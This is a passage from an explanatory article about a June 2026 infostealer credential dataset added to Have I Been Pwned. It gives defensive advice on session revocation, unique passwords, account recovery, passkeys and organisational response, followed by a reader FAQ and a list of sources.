The session point bears repeating because it is the one most often missed. Changing a password protects against future logins that rely on that password, but if the infection captured live session cookies, those cookies can remain valid until they expire or you explicitly sign out of all sessions. Wherever a service offers a “sign out everywhere” or “revoke all sessions” option, use it as part of the cleanup, because it is the step that actually invalidates a stolen cookie a new password would not touch.

For higher-value users, the cleanup extends well beyond passwords, as the earlier section on developers and executives described. Keys must be rotated, tokens revoked, and any cloud or repository access reviewed, because the high-privilege artefacts a stealer takes keep working independently of the passwords you change. The honest summary is that a stealer-log exposure is not a password problem with a password solution. It is a device-compromise problem, and the password rotation is only the visible final step of a cleanup that has to start with the machine and include the sessions and keys a password reset leaves untouched.

Password habits that survive a stealer infection

The uncomfortable truth running through this entire analysis is that you cannot fully prevent a stealer infection, because it depends on human behaviour at a moment of haste, and everyone has bad moments. The realistic goal is not perfect prevention but limiting the damage when an infection happens, and a small set of habits does that work. These are the practices that make a stolen credential close to worthless and contain a single infection to a single account rather than letting it cascade.

The foundation is a unique password for every service, generated and stored by a password manager. This is one recommendation, not two, because unique passwords are impossible to sustain by memory at the scale of modern life, and the manager is what makes uniqueness practical. With unique passwords, a credential stolen from one site works only on that site, so credential stuffing collapses; there is nothing to reuse. The Verizon finding that the median infected user reused roughly half their passwords is the exact failure this habit removes. A manager also lets you audit your whole vault against Pwned Passwords in one pass and replace anything that has been exposed.

There is a subtlety about where the manager stores its data that matters specifically for stealer resistance, and it is worth getting right. A dedicated password manager keeps your credentials behind a master secret and does not expose the entire vault to any program running in your user session the way a browser’s built-in password store can. Reserving the browser’s own password memory for low-stakes accounts, and keeping high-stakes logins in a dedicated manager, limits what a stealer can grab in the seconds it runs. It is not a guarantee, since a sophisticated infection can target managers too, but it changes the default exposure from “everything saved in the browser” to a smaller, better-protected set.

The second habit is a strong second factor on every account that offers one, with a clear preference order. Phishing-resistant methods such as passkeys or hardware security keys are the strongest; app-based authenticator codes are good; SMS codes are the weakest and should be a last resort, because they can be intercepted and socially engineered and are being deprecated by standards bodies for exactly that reason. A second factor does not stop cookie theft, as the earlier sections explained, but it does mean a stolen password alone is not enough to log in, which neutralises the most common use of stealer-log credentials.

The third habit is reducing what is exposed in the first place, which comes back to the infection routes. Not running cracked software, not pasting commands you do not understand into system dialogs, treating unexpected update prompts and verification steps with suspicion, and keeping the operating system and browser patched are the unglamorous behaviours that cut the chance of infection. None of them are technical, and all of them require resisting the specific moments of convenience the lures exploit. Keeping software current matters because, while infostealers rely mainly on social delivery, an unpatched system widens the range of ways malware can take hold and persist.

The fourth habit is signing out of sessions you are not using and periodically reviewing active sessions where services expose them, which limits the value of any cookie a stealer might capture. Short-lived sessions and the discipline of explicitly logging out reduce the window in which a stolen cookie is useful. Where a service offers it, enabling device-bound session protection or equivalent features adds a layer that makes stolen cookies useless elsewhere.

The point of framing these as habits rather than as a one-time response is that the threat is continuous. The firehose of stealer data does not stop, and breach notifications are a lagging signal that arrives after the damage is possible. A standing posture of unique passwords, strong second factors, cautious behaviour and session hygiene means an infection, when it comes, is contained by default rather than requiring a frantic reaction. That is the difference between treating each dataset as a separate emergency and building a baseline that makes most datasets a non-event for you personally. The credentials in the June 2026 corpus are dangerous mainly to people who reused them and left them protected by a password alone; for someone with these habits, an appearance in the corpus is a prompt to confirm and move on, not a crisis.

The account-recovery back door behind every stolen password

Most of the defensive advice around stealer logs focuses on the front door, the login itself, but attackers who cannot get through the front door increasingly go around to the back, through account recovery. Recovery flows exist to let a legitimate user back in after they forget a password or lose a device, and that same mechanism is exactly what an attacker exploits when the password alone stops working. A stealer log is unusually well suited to this, because it hands the attacker not just passwords but the raw material recovery systems rely on to verify identity: the victim’s email address, phone number, security-question answers saved in a browser, and often access to the inbox that resets flow through.

Email sits at the centre of the problem and deserves to be treated as the master key it is. Control of an email account is control of nearly every other account tied to it, because almost every service sends its password reset to that inbox. An attacker who recovers or takes over the email account can then work through the reset process on banking, shopping, social and work accounts one by one, each time receiving the reset link in a mailbox they now own. This is why the standard advice to secure the email account first is not a formality; it is the single most valuable step, and an email account protected only by a stealable password is the weakest link in a person’s entire digital life.

The phone number is the next vulnerability, and it is the reason text-message recovery keeps drawing warnings. A stealer log routinely contains the victim’s phone number alongside their credentials, and where an account allows recovery or a second factor by SMS, an attacker can pursue a SIM-swap, persuading or bribing a mobile carrier to move the number to a device they control. Once the number is theirs, every code and reset link sent by text lands on the attacker’s phone, defeating SMS-based protection entirely. The personal details elsewhere in the log, used to answer a carrier’s identity checks, make that social engineering easier, which is one more reason text-message authentication and recovery are being retired in favour of phishing-resistant methods.

Security questions are a quieter weakness that the contents of a log often expose directly. Answers saved in a browser, or guessable from data the same log contains, turn a supposed identity check into a formality the attacker can pass. A recovery question whose answer is sitting in the stolen data, or is discoverable online, protects nothing, and the convenience of these questions has long outlived whatever security value they once carried. Treating them as a second password, rather than as a memory test, is the only safe way to use them where a service still insists on them.

The practical hardening follows from naming the weak points. Securing the email account with a phishing-resistant second factor or a passkey comes first, because it anchors everything downstream. Reviewing each important account’s recovery options, removing SMS fallback where a stronger method exists, replacing security-question answers with random strings kept in a password manager, and generating and safely storing offline backup codes all close the routes an attacker would otherwise take. Strong authentication on the login achieves little if the recovery path beside it still accepts a password, a text message and a guessable answer, and closing that path is the part of credential defence people most often skip. The June 2026 corpus is full of exactly the data these recovery flows trust, which is why the people in it should look as hard at how their accounts can be recovered as at how they are logged into.

The slow migration away from passwords

The deepest response to stealer logs is to make the thing they steal worthless by design, and that is the promise of passkeys. A passkey replaces the shared password with a cryptographic key pair. The private key never leaves your device and is never transmitted to the service, so there is no shared secret stored anywhere that a stealer could harvest. When you authenticate, the device proves possession of the private key without ever revealing it. A stealer that copies everything on the machine cannot copy a passkey in a form that is usable elsewhere, which removes the entire harvest-and-replay model that infostealers depend on.

The adoption numbers show this is no longer theoretical. By its 2026 World Passkey Day, the FIDO Alliance estimated around five billion passkeys in use worldwide, with awareness near universal at 90% of people surveyed, three-quarters having enabled a passkey on at least one account, and roughly half using them regularly where available. On the enterprise side, more than two-thirds of organisations reported deploying or actively rolling out passkeys for employee sign-ins. Major platforms and services across technology, finance and retail have shipped passkey support, and login success rates and speed have consistently come out ahead of passwords, with passkey sign-in markedly faster than a password and far faster than a password plus a second-factor code.

The security case is exactly the one stealer logs expose. Passkeys address both of the failures that the June 2026 dataset embodies: they cannot be phished, because there is no secret to trick a user into revealing, and they cannot be reused or stuffed, because each is unique to a service and tied to the user’s device. For the two attacks that drive most credential-based breaches, phishing and the reuse of stolen passwords, passkeys remove the underlying vulnerability rather than mitigating it. That is why standards bodies now recognise them at high assurance levels and why regulators increasingly point toward phishing-resistant authentication as the expected baseline.

The migration is genuine but incomplete, and the gaps are where stealer logs keep their relevance. Passkey support has spread top-down, with the largest and most sophisticated platforms first and the long tail of smaller services lagging by years. Until a given account is actually protected by a passkey, it still relies on a password that a stealer can take, and most people will hold a mix of passkey-protected and password-protected accounts for a long time to come. Account recovery remains a weak point, since a poorly designed recovery flow can reintroduce a phishable fallback that undermines the passkey, and getting recovery right is one of the harder parts of a rollout.

There is also a real-world friction in coverage that tempers the optimism. Estimates of actual user adoption on major platforms, as opposed to awareness or enablement on a single account, sit lower, and projections see broad coverage across the long tail of websites taking several more years, with mainstream content and commerce platforms expected to add turnkey support only later in the decade. Passkeys are the clear direction of travel, not a finished destination, and the period in between is precisely when datasets like the June 2026 corpus matter, because passwords remain in wide use and remain stealable.

The honest framing is that passkeys are the structural fix for the problem stealer logs represent, and their spread is the most encouraging trend in this whole area, but they do not retroactively protect the credentials already harvested, and they do not yet cover the full breadth of services people use. The right individual response is to adopt passkeys wherever they are offered, especially on the highest-value accounts, while keeping the password habits described above for everything not yet covered. Over time, as coverage fills in, the harvest a stealer can take shrinks toward irrelevance. For now, the migration is partial, and the contents of the June 2026 logs are a reminder of how much of the internet still runs on the replayable secret that passkeys are built to retire.

Organisational changes worth making after a dataset like this

For a company, the June 2026 corpus is less an event to respond to than a prompt to check whether its defences match the way credential theft actually works now. The central shift in mindset, drawn straight from the threat data, is to stop assuming the perimeter is the line of defence and to assume that some valid credentials for your environment are already compromised, sitting in stealer logs harvested from employees’ and contractors’ devices. Verizon’s framing of “assume access, ready defences” captures it: plan for the attacker who logs in with a real credential rather than only for the one who breaks in.

The first practical change is at the login itself. Enforcing phishing-resistant authentication, ideally passkeys or hardware keys, for administrators and high-risk applications removes the value of a stolen password, because the password alone no longer grants access. Where full passwordless is not yet feasible, requiring strong multi-factor authentication and adding step-up challenges for risky sign-ins raises the bar substantially. Conventional MFA is not a complete answer given cookie theft, but a login protected only by a password is the easiest possible target, and closing that is the most valuable move available.

The second change is screening passwords at the point they are set. Integrating a check against known-compromised lists, such as the Pwned Passwords k-anonymity API, at account creation and password reset blocks users from choosing credentials that are already in the attackers’ dictionaries. Favouring length over arbitrary complexity rules and banning known-bad passwords aligns with current standards and closes off the single most exploited weakness, which is people reusing passwords already sitting in breach corpora.

The third change is monitoring and speed of response. Because the gap between a credential appearing in a stealer log and its exploitation can be a matter of days, organisations need to monitor for their own domains and credentials surfacing in stealer-log datasets and be able to force credential and session resets quickly when they do. HIBP’s domain-monitoring and stealer-log APIs let an organisation see which of its users appear in the logs and which sites their credentials were captured against, turning exposure into a concrete remediation list. The critical detail, repeated throughout this analysis, is that proper remediation includes invalidating active sessions, not just resetting passwords, because a stolen cookie outlives a password change.

The fourth change addresses the unmanaged-device problem that Verizon’s data exposed so starkly. With a large share of corporate credentials in stealer logs coming from non-managed, personal devices, a clear policy on which devices can reach corporate systems, backed by conditional access that checks device posture, is no longer optional. The report’s blunt warning was that an organisation which does not choose a bring-your-own-device policy will have one chosen for it. Controlling access for unmanaged, contractor and partner devices closes a path that endpoint defences on company-owned machines never touched.

Underpinning all of this is the treatment of credentials as volatile, high-risk assets rather than static identifiers. Short-lived credentials, tightly scoped access, aggressive rotation of keys and tokens, and the elimination of long-lived hardcoded secrets all reduce the value and lifespan of anything a stealer manages to harvest, including the machine identities that developers’ devices carry. The secrets-sprawl data, with tens of millions of new hardcoded credentials reaching public code each year, shows how large this surface has become and why it deserves dedicated attention.

The honest organisational summary is that defending against stealer logs is not a single product purchase but an alignment of authentication, password hygiene, monitoring, device policy and credential management around one assumption: that the credential is the target, that some credentials are already gone, and that the job is to make a stolen credential worth as little as possible. The June 2026 dataset is a useful occasion to test that alignment, because somewhere in those addresses are the corporate logins that an attacker may already be holding.

Open questions this dataset cannot settle

For all the detail available, a stealer-log corpus leaves important questions unanswered, and being clear about those limits is part of reading it honestly. The most basic is when the credentials were actually stolen. HIBP added the data on 15 June 2026, but the platform did not specify when the underlying theft occurred, and the recirculating nature of stealer data means the credentials could span a wide range of dates, from recent infections to material harvested years earlier. The load date is a fact; the theft date, for any given credential, is mostly unknown.

A related unknown is which malware families produced the data. Because the corpus is an aggregation from many sources, no single attribution is meaningful, and HIBP did not claim one. The dataset is the combined output of a market rather than the work of one tool, which means questions like “which stealer should I worry about” are the wrong frame; the relevant fact is that the credentials were harvested from infected devices, not which specific program did the harvesting.

The duplication question cannot be fully resolved either, even with deduplication. The 86% crossover with existing HIBP data tells us most of the addresses were seen before, but it does not tell us how much of the password data is genuinely fresh exposure versus old credentials already changed, nor how many of the affected people have since cleaned their devices and rotated their credentials. A credential in the corpus might be live and dangerous, or long since retired and harmless, and the dataset alone cannot distinguish the two for any individual. Only the person checking can know whether a flagged password is still in use.

There is a deeper measurement problem about true scale. The deduplicated figures are honest, but they describe only the data that reached HIBP through the public and semi-public channels that researchers monitor. How much stealer output never surfaces publicly, sits in private paid groups, or is held by criminals with no reason to dump it, is unknowable. The visible corpus is a sample of a larger, partly hidden whole, which means absence from it is weak evidence of safety, and the real volume of harvested credentials is certainly larger than any public dataset shows.

The effectiveness of the emerging defences over time is also genuinely open. Device-bound session credentials and passkeys are promising, but their real-world impact depends on adoption rates across the long tail of services, on how recovery flows are designed, and on how the criminal market adapts. The history of this field is a cat-and-mouse pattern in which each defence raises the cost and the attackers route around it, as the rapid bypass of Chrome’s application-bound encryption showed. Whether device binding and passwordless authentication break that pattern or merely shift it is a question only the next few years will answer.

Finally, the dataset cannot tell any reader the one thing they most want to know, which is their own true risk. Appearing in the corpus confirms a past exposure but not current danger; absence confirms no known exposure but not safety. The evidence supports a posture of caution and concrete action, not a precise personal verdict. That uncertainty is not a flaw in the data so much as a property of the problem: credential theft is a continuous, partly hidden, recirculating phenomenon, and any single snapshot of it, however well prepared, can only ever be a partial and time-bound view.

The direction credential theft is heading

The June 2026 corpus is a single data point in a trend that has been building for years and shows no sign of reversing, and the trend matters more than the dataset. The defining shift is the one this entire analysis has traced: credential theft has moved from breaking into companies toward harvesting individuals, and the infostealer is the instrument of that shift. Attackers increasingly bypass organisations altogether and collect credentials directly from users’ devices, creating a fresh and simpler path to account takeover and to the larger attacks that follow. That redirection is the structural story, and it is what makes datasets like this one a recurring feature rather than an aberration.

The volume is rising, not falling. Estimates put the credentials stolen by infostealers in 2025 in the billions, with tens of millions of devices infected and the number of stealer packages processed climbing sharply year on year. The market’s resilience is the core problem: it runs as a commercial service, new brands launch for a few hundred dollars, and each law-enforcement takedown is followed by successors filling the gap. Supply-side enforcement is real and worthwhile, raising costs and disrupting operations, but it has repeatedly proven unable to end a business model with such favourable economics. As long as replayable secrets are the basis of authentication and demand for stolen logins keeps climbing, the supply will keep being met.

Two forces will shape the next phase, pulling in opposite directions. On the defensive side, the migration to phishing-resistant authentication is the development most likely to bend the curve, because passkeys and device-bound sessions attack the harvest-and-replay model at its root rather than mitigating its symptoms. If coverage spreads across the long tail of services over the coming years, the credentials a stealer can usefully take will shrink, and the value of a corpus like this one will erode. That is the optimistic trajectory, and it is genuinely underway, with billions of passkeys already in use and standards bodies and regulators pushing in the same direction.

On the offensive side, the attackers are adapting in step. They have bypassed browser hardening, built malware that targets authentication seed values and session cookies specifically, expanded onto macOS, and refined social-engineering lures like paste-and-run that need no technical exploit at all. The same automation and tooling that make defence more scalable also make attacks faster and cheaper, and the compression of the gap between a credential’s theft and its exploitation, now measured in days, leaves an ever-shorter window for detection. The contest is between defences that remove the value of stolen credentials and attacks that harvest them faster and route around each new protection.

The realistic near-term outlook is a long, uneven transition rather than a clean resolution. Passwords will persist across much of the internet for years, which means stealer logs will keep accumulating and recirculating, and datasets like the June 2026 corpus will keep landing with depressing regularity. At the same time, the highest-value and most-used services will continue moving to passwordless authentication, gradually carving the most dangerous credentials out of the harvest. The two trends will coexist, and individual and organisational risk will increasingly depend on how far along that transition each person and each company has travelled.

The practical conclusion for a reader is the one that has run through every section. You cannot stop the firehose, but you can make your own credentials worthless to it. Unique passwords behind a manager, phishing-resistant authentication wherever it is offered, caution at the moments the lures exploit, session hygiene, and a clean device turn an appearance in a stealer log from a crisis into a footnote. The June 2026 dataset is a reminder that the threat is structural, continuous and personal, sitting on the device in front of you rather than on a distant server. It is also a reminder that the tools to render it harmless already exist, are spreading fast, and are available to anyone willing to change a few habits before the next corpus, which is already being assembled, lands.

Questions people ask after finding their data in a stealer log

What is the June 2026 Stealer Logs dataset?

It is a collection added to Have I Been Pwned on 15 June 2026 containing about 56.3 million unique email addresses and roughly 124 million unique passwords. The data was compiled from hundreds of millions of stealer-log records harvested from malware-infected devices, then deduplicated before loading. The passwords were added to the Pwned Passwords service, and the addresses to the searchable breach database.

Where did the 124 million passwords actually come from?

They came from individual computers infected with infostealer malware, not from a breach of any single company’s servers. The malware copied saved credentials, browser data and other secrets from each infected device, and those logs were aggregated by criminals and eventually collected by researchers who passed a cleaned corpus to Have I Been Pwned. The defining feature of this data is that the victims are individual people whose own machines were compromised.

Does my password appearing here mean a website I use was hacked?

No. The presence of credentials for a service in a stealer log means users of that service were infected, not that the service itself was breached. This is the exact misreading behind episodes like the October 2025 “Gmail breach” scare, where infostealer data containing Gmail logins was wrongly reported as an attack on Google. A domain in a stealer corpus points at infected users, not a hacked company.

How do I check whether I am affected?

Go to the Have I Been Pwned website directly and enter your email address rather than clicking any link in an email claiming to check for you, because those links are a common phishing trap after a publicised dataset. For passwords, use the Pwned Passwords feature, which most reputable password managers can run across your whole vault automatically. If you sign up for the site’s free notifications, you will be told if your address appears in future loads.

What should I do first if I have been exposed?

Begin with the device itself, because if it is still infected, every new password you set will be captured as you type it. After securing or replacing the machine, change passwords starting with your email account, then financial accounts, then work logins, then everything else, making each one unique. Enable the strongest available second factor and sign out of all active sessions to invalidate any stolen cookies.

What is an infostealer?

It is a type of malware designed to run briefly on a device, scoop up saved credentials, browser cookies, autofill data, cryptocurrency wallets and other secrets, send them to the operator, and often delete itself. Most are sold as a subscription service to criminals who do not need technical skill to use them. The output of these tools is the stealer log that ends up in datasets like this one.

How do devices get infected in the first place?

Almost always because the person at the keyboard runs something they should not have, not through a hidden technical exploit. The dominant lure of recent times is paste-and-run, where a fake verification or error page instructs the user to copy a command and paste it into a system dialog, which installs the malware. Cracked software, game cheats, fake updates and malicious ads are the other common routes.

Will my antivirus protect me?

Not reliably. Research into infected devices found that a large majority of infections happened on machines that had antivirus or endpoint protection running, because evasion is a built-in feature of the malware and because a user who willingly executes the payload bypasses many defences. Security software helps, but it is not the guarantee most people assume.

Are Apple computers safe from this?

No. macOS now has its own active stealer families, including Atomic, Poseidon, Odyssey and MacSync, several spreading through the same lures used against Windows. One macOS stealer was priced as a premium product precisely because Apple users tend to be higher-value targets. The belief that a Mac is immune is outdated.

My accounts have two-factor authentication, so why am I at risk?

Because stealers also capture session cookies, the small files that keep you logged in after you have already passed a second factor. An attacker who imports a stolen cookie can often resume your session without needing the password or the second factor at all, since both were already satisfied when the cookie was issued. This is why remediation must invalidate active sessions, not just reset passwords.

Is it safe to type my password into a checking tool?

Pwned Passwords is designed so you never have to. It uses a method called k-anonymity, where your software hashes the password locally and sends only the first five characters of that hash to the server, which returns matching suffixes for you to compare on your own device. The full password and its complete hash never leave your machine.

Should I change every password I have?

If your device was infected, the safe assumption is that every credential saved in that browser at the time is compromised, so changing them all is reasonable, prioritising the highest-value accounts first. At minimum, change any password that Pwned Passwords flags as exposed and any that you have reused across multiple sites. Use the opportunity to make every password unique going forward.

Why does a password manager matter so much here?

Because unique passwords are the single most effective defence against the reuse that turns one stolen credential into many break-ins, and no one can sustain unique passwords by memory. A manager generates and stores them, audits your whole vault against known-compromised lists in one pass, and keeps credentials behind a master secret rather than exposed in the browser. It is the practical foundation that makes the rest of the advice workable.

Are passkeys the real solution?

They are the closest thing to a structural fix. A passkey replaces the shared password with a cryptographic key pair whose private half never leaves your device and is never sent to the service, so there is no reusable secret for a stealer to harvest. They cannot be phished or stuffed, which removes the two attacks that drive most credential breaches, though coverage across all the services people use will take years to complete.

What is device-bound session protection?

It is a technology, available in Chrome on Windows from April 2026 as Device Bound Session Credentials, that ties a login session to the specific device that created it using hardware-backed keys. A session cookie stolen from such a device stops working when an attacker tries to use it elsewhere. It protects sessions only, does nothing for already-stolen data, and works only where the website has also implemented it.

Why do I keep seeing headlines about billions of leaked passwords?

Because the stealer-log world produces aggregations, huge piles of recycled data merged from many sources, and coverage often reports the inflated row count rather than the deduplicated number of distinct people and passwords. Compilations branded as sixteen or twenty-six billion records typically collapse to far smaller unique figures once duplication is stripped out. The honest numbers are the unique counts, like the 56 million addresses in this dataset.

Is this data new, or just recycled from old leaks?

It is a mix, which is normal for stealer logs. About 86% of the email addresses in this set were already known to Have I Been Pwned from earlier data, so the genuinely fresh exposure is smaller than the headline implies. The data recirculates indefinitely, which means an appearance can reflect an old infection as easily as a recent one.

What does it mean if my check comes back clean?

It means your address has not appeared in the data Have I Been Pwned has loaded and verified, which is reassuring but not a guarantee of safety. Plenty of stolen data never reaches the service or sits in private criminal channels, so absence is weak evidence rather than proof. The preventive habits of unique passwords, strong authentication and a clean device apply regardless of the result.

How does this affect businesses, not just individuals?

A large share of corporate credential theft now originates on employees’ personal, unmanaged devices, where work and personal logins are saved in the same browser. Verizon’s 2025 figures put stolen credentials as the top way attackers first get into organisations, and infected personal machines are a major source. The data also carries developers’ keys and tokens, which can expose company infrastructure far beyond a single password.

What extra risk do developers and executives face?

Their devices tend to hold credentials worth far more than ordinary passwords: SSH keys, cloud tokens, API keys and access to code repositories for developers, and authority over financial and strategic systems for executives. A single infection of such a person can hand an attacker access to systems that many others depend on. Remediation for them goes beyond passwords to rotating keys, revoking tokens and auditing access.

Author:
Jan Bielik
CEO & Founder of Webiano Digital & Marketing Agency

124 million passwords just landed in Have I Been Pwned, and no company lost them
124 million passwords just landed in Have I Been Pwned, and no company lost them

This article is an original analysis supported by the sources cited below

Have I Been Pwned: June 2026 Stealer Logs The primary record for the dataset, detailing the 56.3 million unique email addresses and 124 million unique passwords harvested from infostealer-infected devices and loaded on 15 June 2026.

Have I Been Pwned: Pwned Passwords The service that received the 124 million passwords, with an explanation of the k-anonymity model that lets anyone check a password without exposing it.

Experimenting with stealer logs in Have I Been Pwned Troy Hunt’s account of why and how stealer logs are loaded into the service, including the reasoning behind the email and website domain search features.

Inside the Synthient threat data A detailed walkthrough of a large stealer-log and credential-stuffing corpus, illustrating the high duplication rates and deduplication challenges that also apply to the June 2026 set.

Validating leaked passwords with k-anonymity Cloudflare’s technical explanation of the prefix-based method that powers Pwned Passwords, written by the engineer who contributed the approach.

Have I Been Pwned adds 284M accounts stolen by infostealer malware Coverage of the earlier ALIEN TXTBASE stealer corpus, a useful reference point for how these datasets are sourced, sized and reported.

Google Chrome adds infostealer protection against session cookie theft A report on Device Bound Session Credentials in Chrome, covering how the feature binds sessions to a device and the limits of its initial Windows-only rollout.

124 million stolen passwords discovered, check your accounts now Consumer-facing coverage of the June 2026 dataset, including practical guidance on checking exposure and responding to it.

Have I Been Pwned: infostealer passwords, 124M Reporting on the dataset that emphasises the shift from corporate breaches to credentials stolen directly from victims’ machines.

Disrupting Lumma Stealer: Microsoft leads global action against a favored cybercrime tool Microsoft’s account of the May 2025 operation against Lumma, including the figure of over 394,000 infected Windows devices and roughly 2,300 seized domains.

Lumma Stealer: breaking down the delivery techniques and capabilities of a prolific infostealer A technical analysis of how Lumma is distributed and what it harvests, including its use of ClickFix and abuse of legitimate platforms.

Red Canary Threat Detection Report: information stealers A trend analysis of the infostealer category, covering the malware-as-a-service model, leading families and common delivery methods.

Infostealers bypass new Chrome security feature Research showing how quickly stealers defeated Chrome’s application-bound encryption, a case study in the cat-and-mouse pattern of credential theft defences.

Google just fixed session cookie theft in Chrome: here is what it still cannot stop An assessment of what Device Bound Session Credentials does and does not protect, alongside data on the contents of modern stealer logs.

Infostealer malware and credential theft in 2025 A broad overview of the infostealer threat with statistics on infection volumes, families and the economics of the stolen-credential trade.

The stealer log ecosystem An explanation from the threat-intelligence team behind several recent corpora of how logs are produced, aggregated and recirculated before reaching services like Have I Been Pwned.

Verizon 2025 Data Breach Investigations Report The annual report establishing stolen credentials as the top initial access vector and documenting the role of infostealer logs and unmanaged devices in corporate compromise.

Verizon 2025 Data Breach Investigations Report (full report) The complete report, with the underlying figures on credential reuse, ransomware and the blurring of personal and corporate exposure.

FIDO Alliance reports accelerating global passkey adoption on World Passkey Day 2026 Adoption data for passkeys, including the estimate of around five billion in use and survey figures on awareness and enablement.

NIST Digital Identity Guidelines The standards setting out requirements for phishing-resistant authentication and the recommendation to screen new passwords against lists of compromised values.

The State of Secrets Sprawl 2026 Findings on the tens of millions of new hardcoded secrets reaching public code each year and the rapid growth of leaks tied to AI services, relevant to the high-privilege credentials on developers’ machines.

Microsoft Digital Defense Report 2025 An overview of identity-based attacks and the surge in infostealer use, with the finding that phishing-resistant multi-factor authentication blocks the large majority of identity attacks.